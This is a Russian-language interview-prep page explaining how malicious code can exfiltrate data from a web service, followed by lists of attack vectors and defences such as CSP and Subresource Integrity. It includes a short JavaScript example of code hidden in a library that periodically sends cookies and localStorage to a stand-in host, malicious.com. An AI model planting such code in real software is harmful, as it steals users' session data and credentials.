Встречается на собеседованиях • сегодня
Как вредоносный код может начать отправлять данные на сервисе
Злоумышленник может внедрить вредоносный код через уязвимости (XSS, CSRF) или поддельные зависимости. Например:
javascript
// Пример скрытого кода в библиотеке
setInterval(() => {
fetch('https://malicious.com/steal', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
localStorage: JSON.stringify(localStorage)
})
});
}, 5000);Основные векторы атак:
- Подмена npm-пакетов
- Инъекции через невалидируемый пользовательский ввод
- Компрометация CDN
- Уязвимости в зависимостях
Защита:
- Content Security Policy (CSP)
- Регулярный аудит зависимостей
- Валидация и санитизация ввода
- Использование Subresource Integrity для сторонних скриптов

Софи собрала все вопросы. Тренируйся и получай
офферы быстрее!
офферы быстрее!
Попробовать бесплатно
Следующий вопрос
Это единственный вопрос по вашему фильтру
как отвечать на вопрос
пример собеседования
фреймворки на собеседовании
типичные вопросы junior
интервью вопросы и ответы